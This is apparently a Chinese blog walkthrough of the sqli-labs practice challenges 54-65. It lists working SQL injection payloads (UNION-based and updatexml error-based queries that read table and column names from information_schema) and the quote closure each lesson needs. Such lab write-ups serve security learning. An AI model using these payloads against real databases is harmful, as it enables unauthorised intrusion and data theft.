sqli-labs 54-65(CHALLANGES)
2024-10-21 06:46:08
challenges
less54
数据库为CHALLENGES,且仅有十次尝试机会,十次以后会随机生成一个新的表名和密码
1'order by 3--+
-1'union select 1,2,3 --+
-1'union select 1,2, database() --+
-1'union select 1,2, group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES' --+
less55
用?id=1)包裹,同less54
less56
用?id=1’)包裹
less57
用?id=1“包裹
less58
变成了只有五次机会
用?id=1“包裹
表名:-1'and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES')),1) --+
字段名:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from Information_schema.columns where table_name='lkvyhzvvj3' )),1)--+
less59
无闭合 Less-58
less60
用?id=1")闭合
less61
用?id=1'))闭合
less62
给了一百多次机会还没有回显 显然是要用布尔盲注
布尔盲注 less-9
less63
用?id=1'闭合
less64
用?id=1))闭合
less65
用?id=1")闭合
最新文章
- SQL Server 分隔字符串函数实现
- 2015ACM/ICPC亚洲区长春站 E hdu 5531 Rebuild
- request常用方法小结
- JavaScript高级程序设计(第三版)学习笔记1~5章
- Android 电话自己主动接听和挂断具体解释
- 斯坦福ML公开课笔记15—隐含语义索引、神秘值分解、独立成分分析
- hdu1281+hdu2819(最大匹配数)
- 由<a href = "#" > 引发的思考
- python decorator 进阶
- CAP 2.3版本发布,支持 MongoDB
- ----constructor 与 object----
- WordPress图片或文字添加水印插件:Easy Watermark
- 马凯军201771010116《面向对象程序设计(java)》第二周学习总结
- 【Java】 剑指offer(36) 二叉搜索树与双向链表
- Mac下用zsh
- mysql的myBatis,主键自增设置
- Excel 多个单元格输入同样内容
- 简言MVC
- C语言专题-基本数据类和占位符
- 2D Polygons( Poygon) CGAL 4.13 -User Manual